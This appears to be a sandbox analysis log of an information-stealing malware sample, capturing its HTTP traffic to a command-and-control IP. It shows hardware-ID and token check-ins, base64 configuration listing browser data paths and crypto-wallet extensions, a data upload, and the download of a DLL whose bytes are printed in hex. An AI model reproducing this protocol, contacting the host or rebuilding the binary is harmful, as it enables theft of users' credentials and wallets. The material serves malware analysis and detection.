                                                                                                                                                                  2024-10-03 01:35:52 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                  Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                  2024-10-03 01:35:52 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                                  Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                  2024-10-03 01:35:52 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                  Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.64972249.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:35:53 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:54 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:35:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.64972349.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:35:54 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJ
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 255
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:54 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 46 34 33 39 35 37 36 36 36 43 31 31 38 30 30 38 36 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 2d 2d 0d 0a
                                                                                                                                                                  Data Ascii: ------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="hwid"ABF43957666C118008692-a33c7340-61ca------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------FIDAFCAFCBKECBGCFIIJ--
                                                                                                                                                                  2024-10-03 01:35:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:55 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:35:55 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 3a1|1|1|1|5640526ca290fd017aaabb5cd61ff2dd|1|1|1|0|0|50000|10


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.64972449.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:35:56 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AKJDGIEHCAEHIEBFBKKKCont
                                                                                                                                                                  2024-10-03 01:35:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:56 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:35:57 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.64972549.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:35:57 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------BFBAAFHDHCBGCAKFHDAKCont
                                                                                                                                                                  2024-10-03 01:35:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:35:58 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                  Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.64972649.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:35:59 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:59 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CAFHIJDHDGDBFHIEHDGICont
                                                                                                                                                                  2024-10-03 01:35:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:59 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:35:59 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.64972749.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:00 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DGDBAKKJKKECGDGCAECA
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 6069
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:00 UTC6069OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 41 4b 4b 4a 4b 4b 45 43 47 44 47 43 41 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------DGDBAKKJKKECGDGCAECAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------DGDBAKKJKKECGDGCAECACont
                                                                                                                                                                  2024-10-03 01:36:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:01 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2024-10-03 01:36:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.64972849.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:01 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:02 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:02 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 2459136
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:02 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:02 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                  Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                  2024-10-03 01:36:02 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                  Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
